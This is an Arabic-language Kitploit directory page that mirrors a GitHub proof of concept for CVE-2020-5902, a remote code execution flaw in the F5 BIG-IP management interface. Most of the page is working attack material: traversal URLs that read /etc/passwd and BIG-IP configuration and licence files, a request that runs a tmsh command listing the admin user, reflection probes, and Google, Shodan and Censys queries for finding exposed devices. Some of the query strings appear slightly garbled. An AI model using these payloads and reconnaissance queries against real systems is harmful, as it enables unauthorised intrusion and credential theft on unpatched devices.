Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-5902 — إثبات مفهوم لاستغلال CVE-2020-5902، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد في F5 BIG-IP TMUI، مع حمولات قراءة ملفات وتنفيذ أوامر واستعلامات استطلاع لـ Shodan و Censys. | Kitploit
أدوات/GitHubGitHub/dnerzker/cve-2020-5902
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلومات
GitHubdnerzker/cve-2020-5902

CVE-2020-5902

إثبات مفهوم لاستغلال CVE-2020-5902، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد في F5 BIG-IP TMUI، مع حمولات قراءة ملفات وتنفيذ أوامر واستعلامات استطلاع لـ Shodan و Censys.

عرض المستودع
منذ 6 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2020-5902

ملخص

في إصدارات BIG-IP 15.0.0-15.1.0.3، 14.1.0-14.1.2.5، 13.1.0-13.1.3.3، 12.1.0-12.1.5.1، و 11.6.1-11.6.5.1، تحتوي واجهة إدارة حركة المرور (TMUI)، التي يُشار إليها أيضًا باسم أداة التكوين، على ثغرة أمنية لتنفيذ التعليمات البرمجية عن بُعد (RCE) في صفحات غير معلنة.

إثبات المفهوم

root@kitploit:~
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin 
root@kitploit:~
 	GET /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
	GET /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=randomstuff
	GET /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp 
	GET /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=AnyMsgHereWillBeReflectedInTheResponse

inurl://"tmui/login.jsp"
intitle://"BIG-IP" inurl://"tmui"

~~ جرب استخدام الاستعلامات التالية لـ Shodan:
	1. F5-login-pages
	2. www-authenticate: Basic realm:BIG-IP
	3. BigIP / BIG-IP
	4. htt.favicon.hash:-335242539
	5. http.title:"BIG-IP&req:- Redirect"
~~ جرب استخدام الاستعلامات التالية لـ Censys:
	1.433.https.get.body_sha256:5d78eb6fa93b995f9af90b632f0016e80dbcda8eb71a17994678692585ee5
	2.433.https.get.title:"BIG-IP&req:- Redirect" 

##مرحبًا##

root@kitploit:~
i'm Rizki Ardian
how are you today??  
تنزيل الأداة